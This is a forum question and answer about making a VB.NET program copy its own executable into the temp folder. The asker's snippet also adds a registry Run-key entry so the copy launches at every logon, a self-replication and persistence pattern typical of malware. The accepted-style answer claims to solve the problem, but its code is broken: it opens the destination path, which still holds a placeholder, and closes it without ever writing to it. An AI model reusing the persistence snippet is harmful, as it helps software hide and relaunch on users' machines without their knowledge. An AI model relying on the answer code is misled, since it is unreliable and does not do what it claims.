# Program Self Duplicate to a specific Path

Tags: vb.net, vb.net-2010

I  want to make my program duplicate itself in a specific place but i can just duplicate external files i want the program duplicate its self in a specific place like temp

for example 
it duplicates itself from `application.startuppath()` t)o Desktop gives error ( it can't be converted to 1 dimensional array

```
Dim temp As String = IO.Path.GetTempPath() & "test.exe"
        Dim kurd As String = Application.ExecutablePath

        IO.File.WriteAllBytes(temp, kurd)
        My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "test", "C:\Windows\Temp\test.exe")
```

I want the working code in `VB.Net`

Answer (score 0):

I solved your problem.

The first thing you have to do is : Add your application EXE file to the Resources, and then type this code in your application to duplicate your EXE file from the Resources to a specific path.

Add your "EXE" file to the Resources :
[image]

Add this code:

```
    Dim temp As String = IO.Path.GetTempPath() & "MyESS.exe"
    Dim MyESS As String
    File.WriteAllBytes(temp, My.Resources.MyESS)
    FileOpen(1, temp, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
    MyESS = Space(LOF(1))
    FileGet(1, MyESS)
    FileClose(1)
    FileOpen(1, "C:\Program Files(x86)\MyESS.exe <or any specific path>", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
    FileClose(1)
```

I hope the code was useful to you.